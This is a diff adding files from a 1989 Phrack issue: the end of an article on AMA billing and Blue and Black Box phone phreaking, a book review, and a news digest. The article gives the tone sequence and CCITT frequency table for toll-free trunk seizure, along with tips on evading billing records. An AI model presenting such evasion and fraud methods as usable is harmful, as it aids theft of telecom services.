+bills, the local telephone companies turned to photography.  A photograph of a
+large number of meters served as an incontestable record of their reading at a
+given date and time, and was much easier to convert to customer billing by the
+accounting department.
+
+As you might imagine, even with photographs, billing was cumbersome and did not
+reflect the latest technical developments.  A meter didn't provide any
+indication of what the subscriber was doing with the telephone, nor did it
+indicate how the average subscriber made calls or the efficiency of the
+information service (how fast the operators could handle requests).  So the
+meters were replaced by the AMA machine.  One machine handled up to 20,000
+subscribers.  It produced a punched tape for a 24-hour period that showed,
+among other things, the time a phone was picked up (went off-hook), the number
+dialed, the time the called party answered, and the time the originating phone
+was hung up (placed on-hook).
+
+One other point, which will answer some questions that you're certain to think
+of as we discuss the Black & Blue boxes:  Ma Bell did not want persons outside
+their system to know about the AMA machine.  The reason:  Almost everyone
+had complaints -- usually unjustified -- about their billing.  Had the public
+been aware of the AMA machine they would have asked for a monthly list of their
+telephone calls.  It wasn't that Ma Bell feared errors in billing; rather,
+they were fearful of being buried under any avalanche of paperwork and customer
+complaints.  Also, the public believed their telephone calls were personal and
+untraceable, and Ma Bell didn't want to admit that they knew about the who,
+when, and where of every call.  And so Ma Bell always insisted that billing was
+based on a meter that simply "clicked" for each message unit; that there was no
+record, other than for long-distance as to who called whom.  Long distance was
+handled by, and the billing information was done by an operator, so there was a
+written record Ma Bell could not deny.
+
+The secrecy surrounding the AMA machine was so pervasive that local, state, and
+even federal police were told that local calls made by criminals were
+untraceable, and that people who made obscene telephone calls could not be
+tracked down unless the person receiving the call could keep the caller on the
+line for some 30 to 50 minutes so the connections could be physically traced by
+technicians.  Imagine asking a woman or child to put up with almost an hour's
+worth of the most horrendous obscenities in the hope someone could trace the
+line.  Yet in areas where the AMA machine had replaced the meters, it would
+have been a simple, though perhaps time-consuming task, to track down the
+numbers called by any telephone during a 24 hour period.  But Ma Bell wanted
+the AMA machine kept as secret as possible, and so many a criminal was not
+caught, and many a woman was harassed by the obscene calls of a potential
+rapist, because existence of the AMA machine was denied.
+
+As a sidelight as to the secrecy surrounding the AMA machine, someone at Ma
+Bell or the local operating company decided to put the squeeze on the author of
+the article on Blue Boxes, and reported to the Treasury Department that he was,
+in fact, manufacturing them for organized crime -- the going rate in the mid
+1960's was supposedly $20,000 a box.  (Perhaps Ma Bell figured the author would
+get the obvious message:  Forget about the Blue Box and the AMA machine or
+you'll spend lots of time, and much money on lawyer's fees to get out of the
+hassles it will cause.)  The author was suddenly visited at his place of
+employment by a Treasury agent.
+
+Fortunately, it took just a few minutes to convince the agent that the author
+was really just that, and not a technical wizard working for the mob.  But one
+conversation led to another, and the Treasury agent was astounded to learn
+about the AMA machine.  (Wow! Can an author whose story is squelched spill his
+guts.)  According to the Treasury agent, his department had been told that it
+was impossible to get a record of local calls made by gangsters:  The Treasury
+department had never been informed of the existence of automatic message
+accounting.  Needless to say, the agent left with his own copy of the Bell
+System publication about the AMA machine, and the author had an appointment
+with the local Treasury-Bureau director to fill him in on the AMA machine.
+That information eventually ended up with Senator Dodd, who was conducting a
+congressional investigation into, among other things, telephone company
+surveillance of subscriber lines -- which was a common practice for which there
+was detailed instructions, Ma Bell's own switching equipment ("crossbar")
+manual.
+
+The Blue Box
+~~~~~~~~~~~~
+The Blue Box permitted free telephone calls because it used Ma Bell's own
+internal frequency-sensitive circuits.  When direct long-distance dialing was
+introduced, the crossbar equipment knew a long-distance call was being dialed
+by the three-digit area code.  The crossbar then converted the dial pulses to
+the CCITT tone groups, shown in the attached table (at the end of this file),
+that are used for international and trunkline signaling.  (Note that those do
+not correspond to Touch-Tone frequencies.)  As you will see in that table, the
+tone groups represent more than just numbers; among other things there are tone
+groups identified as 2600 hertz, KP (prime), and ST (start) -- keep them in
+mind.
+
+When a subscriber dialed an area code and a telephone number on a rotary-dial
+telephone, the crossbar automatically connected the subscriber's telephone to a
+long-distance trunk, converted the dial pulses to CCITT tones, set up
+electronic cross-country signaling equipment, and recorded the originating
+number and the called number on the AMA machine.  The CCITT tones sent out on
+the long-distance trunk lines activated special equipment that set up or
+selected the routing and caused electro-mechanical equipment in the target city
+to dial the called telephone.
+
+Operator-assisted long-distance calls worked the same way.  The operator simply
+logged into a long-distance trunk and pushed the appropriate buttons, which
+generated the same tones as direct-dial equipment.  The button sequence was
+2600 hertz, KP (which activated the long-distance equipment), then the complete
+area code and telephone number.  At the target city, the connection was made to
+the called number but ringing did not occur until the operator there pressed
+the ST button.
+
+The sequence of events of early Blue Boxes went like this:  The caller dialed
+information in a distant city, which caused his AMA machine to record a free
+call to information.  When the information operator answered, he pressed the
+2600 hertz key on the Blue Box, which disconnected the operator and gave him
+access to a long-distance trunk.  He then dialed KP and the desired number and
+ended with an ST, which caused the target phone to ring.  For as long as the
+conversation took place, the AMA machine indicated a free call to an
+information operator.  The technique required a long-distance information
+operator because the local operator, not being on a long distance trunk, was
+accessed through local wire switching, not the CCITT tones.
+
+Call Anywhere
+~~~~~~~~~~~~~
+Now imagine the possibilities.  Assume the Blue Box user was in Philadelphia.
+He would call Chicago information, disconnect from the operator with a KP tone,
+and then dial anywhere that was on direct-dial service:  Los Angeles, Dallas,
+or anywhere in the world if the Blue Boxer could get the international codes.
+
+The legend is often told of one Blue Boxer who, in the 1960's, lived in New
+York and had a girl friend at a college near Boston. Now back in the 1960's,
+making a telephone call to a college town on the weekend was even more
+difficult than it is today to make a call from New York to Florida on a
+reduced-rate holiday using one of the cut-rate long-distance carriers.  So our
+Blue Boxer got on an international operator's circuit to Rome, Blue Boxed
+through to a Hamburg operator, and asked Hamburg to patch through to Boston.
+The Hamburg operator thought the call originated in Rome and inquired as to the
+"operator's" good English, to which the Blue Boxer replied that he was an
+expatriate hired to handle calls by American tourists back to their homeland.
+Every weekend, while the Northeast was strangled by reduced-rate long-distance
+calls, our Blue Boxer had no trouble sending his voice almost 7,000 miles for
+free.
+
+...The user placed the speaker over the telephone handset's transmitter and
+simply pressed the buttons that corresponded to the desired CCITT tones.  It
+was just that simple.
+
+Actually, it was even easier than it reads because Blue Boxers discovered they
+did not need the operator.  If they dialed an active telephone located in
+certain nearby, but different, area codes, they could Blue Box just as if they
+had Blue Boxed through an information operator's circuit.  The subscriber whose
+line was Blue Boxed simply found his phone was dead when it was picked up.  But
+if the Blue Box conversation was short, the "dead" phone suddenly came to life
+the next time it was picked up.  Using a list of "distant" numbers, a Blue
+Boxer would never hassle anyone enough times to make them complain to the
+telephone company.
+
+The difference between Blue Boxing off of a subscriber rather than an
+information operator was that the AMA tape indicated a real long-distance
+telephone call perhaps costing 15 or 25 cents -- instead of a freebie.  Of
+course that is the reason why when Ma Bell finally decided to go public with
+"assisted" newspaper articles about the Blue Box users they had apprehended, it
+was usually about some college kid or "phone phreak."  One never read of a
+mobster being caught.  Greed and stupidity were the reasons why the kid's were
+caught.
+
+It was the transistor that led to Ma Bell going public with the Blue Box.  By
+using transistors and RC phase-shift networks for the oscillators, a portable
+Blue Box could be made inexpensively, and small enough to be used unobtrusively
+from a public telephone.  The college crowd in many technical schools went
+crazy with the portable Blue Box; they could call the folks back home, their
+friends, or get a free network (the Alberta and Carolina connections -- which
+could be a topic for a whole separate file) and never pay a dime to Ma Bell.
+
+Unlike the mobsters who were willing to pay a small long-distance charge when
+Blue Boxing, the kids wanted it, wanted it all free, and so they used the
+information operator routing, and would often talk "free-of-charge" for hours
+on end.
+
+Ma Bell finally realized that Blue Boxing was costing them Big Bucks, and
+decided a few articles on the criminal penalties might scare the Blue Boxers
+enough to cease and desist.  But who did Ma Bell catch?  The college kids and
+the greedies.  When Ma Bell decided to catch the Blue Boxers she simply
+examined the AMA tapes for calls to an information operator that were
+excessively long.  No one talked to an operator for 5, 10, 30 minutes, or
+several hours.  Once a long call to an operator appeared several times on an
+AMA tape, Ma Bell simply monitored the line and the Blue Boxer was caught.
+(Now you should understand why I opened with an explanation of the AMA
+machine.)  If the Blue Boxer worked from a telephone booth, Ma Bell simply
+monitored the booth.  Ma Bell might not have known who originated the call, but
+she did know who got the call and getting that party to spill their guts was no
+problem.
+
+The mob and a few Blue Box hobbyists (maybe even thousands) knew of the AMA
+machine, and so they used a real telephone number for the KP skip.  Their AMA
+tapes looked perfectly legitimate.  Even if Ma Bell had told the authorities
+they could provide a list of direct-dialed calls made by local mobsters, the
+AMA tapes would never show who was called through a Blue Box.  For example, if
+a bookmaker in New York wanted to lay off some action in Chicago, he could make
+a legitimate call to a phone in New Jersey and then Blue Box to Chicago.  His
+AMA tape would show a call to New Jersey.  Nowhere would there be a record of
+the call to Chicago.  Of course, automatic tone monitoring, computerized
+billing, and ESS (Electronic Switching System) now makes that virtually
+impossible, but that's the way it was.
+
+You might wonder how Ma Bell discovered the tricks of Blue Boxers.  Simple,
+they hired the perpetrators as consultants.  While the initial newspaper
+articles detailed a potential jail penalties for apprehended blue boxers,
+except for Ma Bell employees who assisted a blue boxer, it is almost impossible
+to find an article on the resolution of the cases because most hobbyist blue
+boxers got suspended sentences and/or probation if they assisted Ma Bell in
+developing anti-blue box techniques.  It is asserted, although it can't be
+easily proven, that cooperating ex-blue boxers were paid as consultants.  (If
+you can't beat them, hire them to work for you.)
+
+Should you get any ideas about Blue Boxing, keep in mind that modern switching
+equipment has the capacity to recognize unauthorized tones.  It's the reason
+why a local office can leave their subscriber Touch-Tone circuits active,
+almost inviting you to use the Touch-Tone service.  A few days after you use an
+unauthorized Touch-Tone service, the business office will call and inquire
+whether you'd like to pay for the service or have it disconnected.  The very
+same central-office equipment that knows you're using Touch-Tone frequencies
+knows if your line is originating CCITT signals
+
+The Black Box
+~~~~~~~~~~~~~
+The Black Box was primarily used by the college crowd to avoid charges when
+frequent calls were made between two particular locations, say the college and
+a student's home.  Unlike the somewhat complex circuitry of a Blue Box, a Black
+Box was nothing more than a capacitor, a momentary switch, and a battery.
+
+As you recall from our discussion of the Blue Box, a telephone circuit is
+really established before the target phone ever rings, and the circuit is
+capable of carrying an AC signal in either direction.  When the caller hears
+the ringing in his or her handset, nothing is happening at the receiving end
+because the ringing signal he hears is really a tone generator at his local
+telephone office.  The target (called) telephone actually gets its 20
+pulses-per-second ringing voltage when the person who dialed hears nothing in
+the "dead" spaces between hearing the ringing tone.  When the called phone is
+answered and taken off hook, the telephone completes a local-office DC loop
+that is the signal to stop the ringing voltage.  About three seconds later the
+DC loop results in a signal being sent all the way back to the caller's AMA
+machine that the called telephone was answered.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                            CCITT NUMERICAL CODE
+                            ~~~~~~~~~~~~~~~~~~~~
+    Digit      Frequencies (Hz)
+
+    1          700+900
+    2          700+1100
+    3          900+1100
+    4          700+1300
+    5          900+1300
+    6          1100+1300
+    7          700+1500
+    8          900+1500
+    9          1100+1500
+    0          1300+1500
+    Code 11    700+1700  for inward
+    Code 12    900+1700  operators
+    KP         1100+1700  Prime (Start of pulsing)
+    KP2        1300+1700  Transit traffic
+    ST         1500+1700  Start (End of pulsing)
+_______________________________________________________________________________
diff --git a/phrack25/8.txt b/phrack25/8.txt
new file mode 100644
index 0000000..ea13944
--- /dev/null
+++ b/phrack25/8.txt
@@ -0,0 +1,179 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 25, File 8 of 11
+
+        /*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\
+        \*/                                                         \*/
+        /*\          Hacking:  What's Legal And What's Not          /*\
+        \*/              Written by Xandor SymmLeo Xet              \*/
+        /*\         With Technical Assistance From The ICH          /*\
+        \*/                                                         \*/
+        /*\     Reviewed by HATCHET MOLLY (TK0GRM1@NIU.BITNET)      /*\
+        \*/               Exclusively for Phrack Inc.               \*/
+        /*\                                                         /*\
+        \*/                      March 8, 1989                      \*/
+        /*\                                                         /*\
+        \*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/
+
+
+"Hacking:  What's Legal And What's Not" was originally published in 1987 by
+"HackTel Communications" of Crosby, Texas.  Reportedly the book is no longer
+being published as the author, Xandor SymmLeo Xet, has joined the United States
+Army.  E. Arthur Brown of Minnesota has bought out the remaining stock and is
+selling it for $12.95 (plus postage and handling) which is about half off it's
+"cover price" of $25.00.
+
+We've always been taught not to judge a book by its' cover, and I suppose that
+one should not expect beautiful binding and great illustrations in
+self-published books, especially those that deal with hacking and phreaking.
+But I can't help comment on the sheer ugliness of this volume.  To be fair, I
+should preface these remarks by saying that E. Arthur Brown Company does
+give fair warning about the packaging of this book in their advertisement.
+
+The "book" consist of about 300 photocopied reproductions of non-NLQ dot matrix
+pages.  However, this does not mean you get three hundred pages of information
+as about half of the pages are single sided copies.  All in all I'd say it
+could be reduced to about 200 pages if everything was copied back to back.
+These pages come in a nice three ring binder, black in color, and it even has
+the name of the book silk screened on the cover.  (I can't resist mentioning
+that the title of the book is improperly punctuated on the cover, though it is
+correct inside the manuscript.)
+
+Presumably the author(s) intended to release follow up reports and addendum to
+the book at later dates (and at additional cost).  So the three-ring binder
+approach makes sense, and the author does explain that he has used single sided
+copies in some places to allow for easy insertation of these "Hacker Reports."
+So perhaps criticisms of the books packaging are a little unfair since it
+appears these concessions were made with a purpose in mind.  This does not,
+however, change what you do indeed get when you order this book.  All potential
+buyers should be aware of what they are getting for their money.
+
+Enough of what the book looks like, let's examine what it has to offer.
+Generally speaking, it is a cross between a "how to" and a legal reference
+guide.  Much of the book is dedicated to state and federal laws that deal with
+hacking, phreaking, and pirating.  You'll find reprints of the state computer
+crime laws for every state of the union, (current at the time the book was
+written) and the Federal wire fraud and copyright laws.  It does not include
+the Federal Electronic Communication Privacy Act (ECPA) perhaps because act was
+not passed at the time the book was compiled.  The sections on state laws
+appear complete enough, and the full source and appropriate references are
+given if you want to check them for accuracy or changes.  Thoughtfully, the
+author has even included the associated penalties each statute carries.  And
+for those of you who aren't quite up on your Latin, there is even a (very)
+short legal glossary so you can better understand the language of the law.
+
+The crime laws make up the bulk of the book.  They are probably the most useful
+section despite the fact that the information is at least three years old by
+now.  The rest of the book is dedicated to various topics that are mundane to
+anyone that is an active practitioner of phreaking and/or hacking.  Topics like
+"what is a network" and "how does a war dialer work" really do little for the
+accomplished hacker, and the public can get the same information in the better
+written book by Bill Landreth.
+
+One point that interested me is that Xet adheres more to the "computer
+professional" definition of "hacker" than he does to the definition used by
+most of the underground.   In other words, he maintains that people who gain
+unauthorized access to systems are "crackers," not "hackers."  He, like many
+phreak/hackers, gets upset when the media uses the term incorrectly, but his
+reasoning is a little different from most.  Interestingly enough, despite an
+entire chapter on software piracy, Xet does not realize that "cracker" already
+refers to a specific type of activity and suggesting it as an alternative to
+"hacker" only serves to further muddy the waters.  To some this may be a minor
+point, but the indiscriminate and apparently uninformed use of terms and labels
+is ill advised in a book that aspires to be a useful reference manual.
+
+By way of illustration, I've excerpted his definitions (actually, they should
+properly be called "descriptions") of various terms from the glossary:
+
+     Hacker:  A non-business computer user who operates a computer in
+              conjunction with a modem and who at least knows his (or her) way
+              around a local bulletin board and has at least heard of
+              CompuServe and The Source.  Can usually be found eating pizza or
+              donuts, and has a working knowledge of the effects of long term
+              exposure to great amounts of caffeine either from drinking
+              several softdrinks (sic) or numerous cups of coffee.
+
+     Cracker:  A hacker who has an adventurous streak which leads him into
+               unknown computer menus and strange protocols of all benign.  He
+               has the ability to crack access codes or passwords in order to
+               illegally enter a computer over the telephone.  Usually a very
+               good problem solver, quick to think, cautious to act.  Often
+               thought of as clever or even sneaky.  Excellent chess players.
+
+     Chrasher:  A cracker gone bad.  One who gets his jollies from terminating
+                corporate systems and picking on helpless bulletin boards by
+                destroying information or files or by rendering a system unable
+                to communicate (usually referred to as "crashing" the system)
+                until reset by a sysop.  Very clever, extremely dangerous.
+                Smart, but hopelessly misdirected.  They deserve respect for
+                their ability to destroy.
+
+     Pirate:  Software pirate.  A hacker who concentrates his efforts toward
+              cracking software copyright protection schemes which are placed
+              on computer disks to prevent the illegal copying of factory
+              produced programs.  Some pirates have a habit of collecting
+              software that they have managed to crack either to trade with
+              other pirates for software they don't have yet or just to collect
+              it for the sake of building their egos.  Some of my best friends
+              are pirates.  Usually, very easy going people, and sometimes
+              politically minded as well.  And even more clever than crackers
+              or crashers.
+
+The problem with these definitions is that they are not mutually exclusive and
+do little but reinforce the stereotypes that hackers, phreakers, and pirates
+already face.  Any phreak/hacker that reads this book will give these
+definitions little attention, if they read them at all, but if this manual is
+used by the media as an "example of hacker literature" it will only further
+perpetuate some of these assumptions.
+
+A large amount of the book is dedicated to what Xet calls The Gray Pages.
+Labeled as a "national hackers' phone book" it is primarily a list of dialups
+for Telenet, Tymnet, Compuserve, and The Source.  This list is hardly "secret"
+and the format hints that it may just be a capture of the "info" pages from
+each of these networks.  These numbers may be helpful to the beginner, but it
+would have been better if he included instructions on how to dial the toll free
+access number (or call customer service and just ask them) and check for your
+local number by yourself.  Not only would this have cut down on the number of
+pages needed, but it would have at least given the beginner an excuse to
+actually do something themselves.  (Not to mention that is the best way to get
+the most accurate information.)
+
+The rest of "The Gray Pages" is taken up by a list of 400 public BBS systems.
+Although the list is titled "hacker bulletin boards" many of the systems listed
+are quite legitimate and do not support phreak/hack or pirate activities.  Woe
+to the beginner who calls CLAUG and starts asking for plans to a blue box.  Of
+course the biggest draw back to this list is that it was probably fifty percent
+out of date four months after it was printed.
+
+Speaking of blue box plans, Xet does offer a short list of box colors and what
+they do.  No plans for boxes are included, nor is there a discussion of DTMF
+tones or other common phreak knowledge.  He does include simple schematics and
+operating instructions for a tap indicator, wire recorder, and a data converter
+(for use with the wire recorder).  The introduction to this section, called
+"gray market equipment" says that future editions of the book will include box
+schematics.
+
+Finally, there is a short section called "helpful stuff" written by "The ICH."
+This section is pretty informative but offers little clarifying information.
+Basically it includes an ASCII table, DTMF frequencies, satellite and cellular
+frequencies, and a short discussion of packet switching networks.
+
+In summary, "Hacking:  What's Legal And What's Not" offers some very basic
+information to the beginning hacker, a quite good (although potentially
+outdated) review of relevant state and federal computer crime laws, and a few
+tid-bits here and there that are worth knowing.  But it also wastes a lot of
+space to bulletin boards and dialup numbers that are of little use to anyone.
+Experienced phreak/hackers and pirates will find a few articles that are not
+available elsewhere (like the section on "How Hackers Think" where Xet says
+that since a San Diego BBS poll indicated that 79% of "hackers" had the
+astrological sign of Leo all one has to do to understand hackers is read a
+profile of Leo's!) but the vast majority of the information is old news in a
+new format.
+
+For someone who wants to get a broad overview of the computer underground I can
+recommend this book.  But if someone is looking for information of any real
+use, I suggest you contact your local phreak/hack BBS and use the G-philes they
+have available.  You won't be missing anything this book has to offer.  E.
+Arthur Brown's price of $12.95 offers a reasonable value, and if your looking
+to develop a "hacker library" you might consider ordering a copy.
+_______________________________________________________________________________
diff --git a/phrack25/9.txt b/phrack25/9.txt
new file mode 100644
index 0000000..c4c360a
--- /dev/null
+++ b/phrack25/9.txt
@@ -0,0 +1,381 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 25, File 9 of 11
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXV/Part 1                 PWN
+            PWN                                                 PWN
+            PWN                 March 29, 1989                  PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Standing On The Edge Of The Network
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Greetings once again and welcome to Phrack World News Issue 25, our 25th
+Anniversary Special.
+
+This issue features articles about the New TAP Magazine, a battle between
+Southwestern Bell and bulletin board operators in Oklahoma City, a whole file's
+worth of information about the KGB hackers, Matthias Speer, Klaus Brunnstein,
+an interview with Pengo, and much more.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Suiting Up For SummerCon '89                                     March 22, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Once again, for those who may have missed last issue...
+
+                                 SummerCon '89
+                             Saint Louis, Missouri
+                               June 23-25, 1989
+
+                               Brought To You By
+                 Forest Ranger / Knight Lightning / Taran King
+
+The agenda for this year's SummerCon is going to be a sort of mixture of the
+first two.  We do intend to hold an actual conference on Saturday, June 24,
+1989.  This conference will last as long as necessary and anyone who wishes to
+speak should prepare a presentation ahead of time and notify us as soon as
+possible.
+
+The location of SummerCon '89 has been decided upon, but reservations are still
+in the progress of being made.  For this reason, we have declined to print the
+name of the hotel for the convention at this time.  Anyone who is seriously
+interested in going to SummerCon '89 and thinks that they will be able to
+attend should contact Taran King or myself as soon as possible.
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Mitnick Plea Bargains                                            March 16, 1989
+~~~~~~~~~~~~~~~~~~~~~
+By Kim Murphy (Los Angeles Times [Excerpts Only])
+
+Kevin Mitnick pleaded guilty to one count of computer fraud and one count of
+possessing unauthorized long-distance telephone codes.  He admitted penetrating
+a DEC computer in Mass., secretly obtaining a copy of a sophisticated computer
+security program which the company had spent $1 million to develop.
+
+The program, said Mitnick's attorney, was designed to alert companies when
+their computers had been penetrated by hackers like Mitnick.  Mitnick never
+attempted to sell or distribute the program, he said.  Mitnick also admitted
+possessing 16 unauthorized MCI long-distance codes that enabled him to make
+long-distance telephone calls without charge.  A prosecutor said Mitnick used
+the codes to make connections to computers.
+
+Mitnick faces one year in prison.  Under a plea agreement with the government,
+he must also submit to three years' supervision by probation officers after his
+release from prison.  Prosecutors said they agreed to a 12-month sentence
+because the amount of financial damage was relatively low.  DEC lost about
+$100,000 to $200,000 in computer "down time" investigating the security program
+theft.
+
+As part of the plea agreement, prosecutors agreed to dismiss two additional
+counts charging Mitnick with illegally accessing the Leeds University computer
+in England and separate charge related to the DEC computer program.
+_______________________________________________________________________________
+
+The NEW Technological Advancement Party (TAP)                    March 11, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Aristotle and the TAP Magazine Staff
+
+
+How TAP Will Be Printed
+
+TAP will be created, edited, and printed on various machines that the staff
+either owns or has full access to.  The computers range from personal computers
+to mainframes.
+
+The printing devices range from dot-matrix printers to industrial laser
+printers.  Again, the staff has full access to all of these devices.  In order
+to upgrade the quality of print and to take some of the load off of the staff,
+the staff is looking into getting TAP printed by a professional printer.
+
+
+Funding Of TAP
+
+Hopefully TAP will be funded majorly by the subscribers.  Unlike TAP in it's
+early years, we cannot afford to just give TAP away.  Except for issue 92, we
+will not GIVE TAP away for free.  We feel the policy of the old TAP towards
+this issue was the major cause of their cronic shortage of money.  As far as
+startup costs, the staff can support all costs except for Printing, Paper, and
+Postage.  For 1.00 an issue, we feel we should be able to sufficiently support
+TAP from the subscribers fees.  All money received will be put into an account
+that will be used for TAP purposes ONLY.  There will be no distributing of
+wealth between the staff.  The three expenses above will be the major areas of
+spending with an occasional expense of advertising and such.
+
+
+How TAP Will Be Getting Articles
+
+As of right now, the staff has enough articles ready to be printed to support
+TAP for at least 4 issues.  We hope TAP will become dependant on articles
+submitted by subscribers.  If people do not submit articles to TAP, we will be
+forced to fill up space with lesser articles (thus lessening the quality of
+TAP.)  We figure that at the worst, TAP can sustain itself for one year with NO
+submitted articles.  That way we will not be ripping anyone off and we can fade
+away in peace. (Hopefully we won't have to do that!)
+
+
+Who is involved with TAP
+
+As of 03/07/89, the TAP staff consists of five people.  These 'staffers' are:
+Aristotle, Olorin The White, Predat0r, and two others that wish to remain
+anonymous.  The last two have elected to remain anonymous for various reasons,
+one being to maintain their freedom.  The staff does not feel that we need to
+list names in TAP (yet) to give the newsletter a good reputation.  We feel that
+readers should subscribe to TAP because of the quality of the newsletter and
+not because of the staff members.  Of course, if you submit an article, you
+will be given credit where it is due.  Credit to the author of any article we
+print will be given unless the author expresses wishes that he/she does not
+want to be recognized.  Of course if TAP cannot find the name of the author of
+a specific article, we cannot print the credits.
+
+
+Why We Decided To Print A Newsletter
+
+After gathering information from bulletin boards and other sources, various
+members of the staff decided that they would like to print hard to obtain
+information in hardcopy form and an easy to understand format.  We feel that
+certain information cannot be successfully represented and distributed with
+computers only.  One excellent example is a schematic of any device.  We all
+know how bad ASCII schematics suck.  And with practically everyone in the
+community owning a different computer, how can we communicate efficiently?
+Well, printed material (on paper) is our answer.
+
+In addition to the advantage print has over text files, there are various other
+reasons for our wanting to print a newsletter.  Due to the lack of experts
+wanting to teach newcomers to the community (excluding certain individuals), we
+have decided to do something about it.  TAP will attempt to explain information
+so that EVERYONE can understand it.  We will not hesitate to help any
+beginners, nor hesitate to give information to the more experienced members of
+the community.  All members of the community will be supported by TAP.  TAP is
+an equal opportunity informer.
+
+
+Why We Decided To Print TAP
+
+When we first received our collection of TAP issues (along with some 2600's),
+we were astounded.  After learning from bbs's and voice calls, the value of TAP
+and 2600 were obvious.  We liked 2600 a lot, but we LOVED TAP.  TAP fit our
+personalities perfectly.  It has something for everyone.  Around that time, we
+promptly looked into subscribing to the two magazines.  As you know, TAP died
+in 1984 and 2600 is still in print.  Well, we subscribed to 2600 and kept on
+studying our old TAP issues.  When the suggestion came to put out a magazine,
+the first idea that was suggested was TAP.  It was decided after a LONG
+discussion that TAP would be perfect for our newsletter.  Since we are
+interested in hacking, phreaking, AND other topics, we felt TAP better
+expressed our opinions and ideas than any other newsletter idea.  Hell, we just
+straight up loved that old TAP and we cannot pass up the opportunity to bring
+it back into existence and (hopefully) it's original glory.
+
+
+Where To Find TAP
+
+If you have any other questions regarding TAP, you can contact the staff via
+snail mail (US postal service) or via staff accounts on the bulletin boards
+listed below.
+
+US Mailing Address:                   TAP
+                                P.O. Box 20264
+                             Louisville, KY 40220
+
+Beehive BBS - 703-823-6591
+Hackers Den - 718-358-9209
+Ripco       - 312-528-5020
+
+
+Thank you,    Tap Staff
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Editor's Comments
+~~~~~~~~~~~~~~~~~
+Upon first hearing about the newly formed TAP Magazine, I scoffed and thought
+it would be another pipe dream like many other countless previous attempts.  To
+my surprise, the magazine was delivered just like they promised.
+
+Issue 92 contained the following:
+
+TAP RAP - Basically the staff's remarks about the new magazine and the
+          subscription information.
+
+A BIT on BITNET (An Introduction to BITNET) - This was a reprint of Aristotle's
+                Bitnet file that appeared in P/HUN Newsletter Issue 3.
+
+BELL PAYS for Evil deeds - News article about Cincinnati Bell Telephone Co.
+
+TMC PIN - Information about PIN codes of TeleMarketing Company.
+
+Pyro-How To - How to make Nitrogen Tri-Iodide.
+
+Miscellaneous catalog information for Loompanics Unlimited and Specialized
+Products Company.
+
+Big Brother section - An article about revenge tactics and social engineering
+                      taken from Flagship News (employee publication of
+                      American Airlines).  The article was also previously seen
+                      in RISKS Digest.
+
+TELEPHONE CONTROLLED TAPE STARTER + Schematics
+
+The infamous "Ma Bell Is A Cheap Mother" logo and a few other surprises are
+also included in this issue.  The last part of the newsletter lists
+information that the TAP Staff is looking for.
+
+My reaction to the issue was positive over all.  The print quality was very
+good and extremely readable.  The issue itself was a bit crumpled up by the US
+Postal Service, but that is to be expected.  The first issue was a test
+product and that is the reason for a little bit of un-original material, says
+Aristotle.
+
+It is my understanding that the future holds all sorts of neat articles and
+overall it would appear that at $12.00 a year, the new TAP is a good
+investment.
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Two Men Seized As Phone Looters                                  March 13, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Two phony repairmen wearing stolen Illinois Bell hardhats and carrying around
+stolen repairman tools have demonstrated that ripping off payphones is not
+small change.
+
+Arrested in Chicago, Illinois last week were George W. Parratt, age 47, of Sauk
+Village, IL and Arthur P. Hopkinson, age 40, of Hickory Hills, IL; two south
+suburbs of Chicago.
+
+The two men, posing as Illinois Bell repairmen and driving a white and blue van
+disguised to look like an Illinois Bell truck, have stolen thousands of dollars
+from pay telephones all over Chicago.  Their average take was about $200 per
+phone -- and they have hit some phones two or three times.
+
+Just the cost of repairing the phones damaged in the past year cost more than
+$50,000 said Illinois Bell Telephone spokesman Tony Abel.
+
+These two fellows were making a full time living looting pay phones, although
+Mr. Abel did not have the final total of the amount looted immediately
+available when we discussed the case.
+
+Abel said Illinois Bell employees spotted the phony van on two separate days
+and notified the security department of Bell.  Security representatives were
+able to trace the license plate on the van, and they found it parked in
+Parratt's driveway.  The investigators secretly followed the van and watched
+Parratt and Hopkinson loot two pay phones in Calumet City, Illinois, and two in
+Hammond, Indiana; a community on the stateline served by Illinois Bell.
+
+When the two men drove back across the stateline into Calumet City, and started
+breaking into another payphone, the investigators arrested them.  Cook County
+sheriff's Lt. Thomas Oulette, called to the scene, said the two had $120 in
+change and $650 in stolen tools from Illinois Bell at the time of their arrest.
+He said they were able to break into a coin box, dump it and get away in less
+than three minutes.
+
+"It was a pretty good scam," said Oulette, who noted that the investigators
+from Illinois Bell told him they believed the company had been hit by the pair
+for about $35,000 in the nine months the company was specifically aware of them
+without knowing who they were.
+
+Parratt and Hopkinson were released on bond, and are scheduled to appear in
+Circuit Court (Markham, Illinois branch) on April 17, 1989.
+
+                    Information Provided by Patrick Townson
+_______________________________________________________________________________
+
+Bank Fraud Was "Easy"                                         February 24, 1989
+~~~~~~~~~~~~~~~~~~~~~
+>From The Independent (London)
+
+"A 17-year-old junior cashier cheated the National Westminster Bank out of 1
+million pounds in a computer fraud," a court heard yesterday.
+
+Judge Helen Palin criticized the bank for lax security and refused to make a
+compensation order for 15,000 pounds which the bank has not been able to
+recover.
+
+After being given access to the bank's computer system he began by paying 10
